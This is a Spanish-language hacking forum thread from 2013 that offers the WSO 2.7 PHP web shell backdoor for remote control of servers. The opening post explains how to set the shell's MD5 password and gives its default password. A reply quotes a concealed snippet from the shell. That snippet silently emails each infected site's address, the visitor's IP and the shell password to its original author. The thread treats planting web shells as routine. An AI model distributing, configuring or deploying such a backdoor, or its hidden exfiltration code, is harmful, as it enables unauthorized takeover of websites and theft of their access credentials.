[PHP] WSO shell backdoor

Iniciado por craventhegod, Mayo 12, 2013, 02:46:46 PM

Tema anterior - Siguiente tema

0 Miembros y 3 Visitantes están viendo este tema.

WSO es una php shell backdoor  que proporciona una interfaz para distintas operaciones remotas,  ahora en su version 2.7 con nuevas herramientas y un vistoso cambio en imagen.



con pass simple                  You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

pass con error 404                 You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login



importante cambiar la contraseña de la shell***



1. Abriremos nuestra shell en un editor de texto plano (yo les recomiendo notepad)

2. buscaremos

$auth_pass = "1846c8d1ead7d12e9f4d18db001ff079″;



lo remplazaremos por nuestra contraseña en MD5 y guardamos

ya que si no quieren cambiar la pass.
la contraseña por defecto es:

hackmeDON


todo es relativo, hasta nuestra existencia :) Shalom

Hay que enseñarles a ofuscar código a estos juakerz

Código: text

$visitc = $_COOKIE["visits"];
if ($visitc == "") {
  $visitc  = 0;
  $visitor = $_SERVER["REMOTE_ADDR"];
  $web     = $_SERVER["HTTP_HOST"];
  $inj     = $_SERVER["REQUEST_URI"];
  $target  = rawurldecode($web.$inj);
  $judul   = "WSO 2.7 http://$target by $visitor";
  $body    = "Bug: $target by $visitor - $auth_pass";
  if (!empty($web)) { @mail("[email protected]",$judul,$body,$auth_pass); }
}
else { $visitc++; }
@setcookie("visitz",$visitc);
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
In my mind where before there was order, today there is only chaØs!

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Hay que enseñarles a ofuscar código a estos juakerz

Código: text

$visitc = $_COOKIE["visits"];
if ($visitc == "") {
  $visitc  = 0;
  $visitor = $_SERVER["REMOTE_ADDR"];
  $web     = $_SERVER["HTTP_HOST"];
  $inj     = $_SERVER["REQUEST_URI"];
  $target  = rawurldecode($web.$inj);
  $judul   = "WSO 2.7 http://$target by $visitor";
  $body    = "Bug: $target by $visitor - $auth_pass";
  if (!empty($web)) { @mail("[email protected]",$judul,$body,$auth_pass); }
}
else { $visitc++; }
@setcookie("visitz",$visitc);


este es un descarado...... ----> You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login@gmail.com

;D ;D ;D ;D ;D

eso pasa por ocupar herramientas de otros o lo que es lo mismo ser un simple kiddie xD
El conocimiento es libre...
La información no lo es xD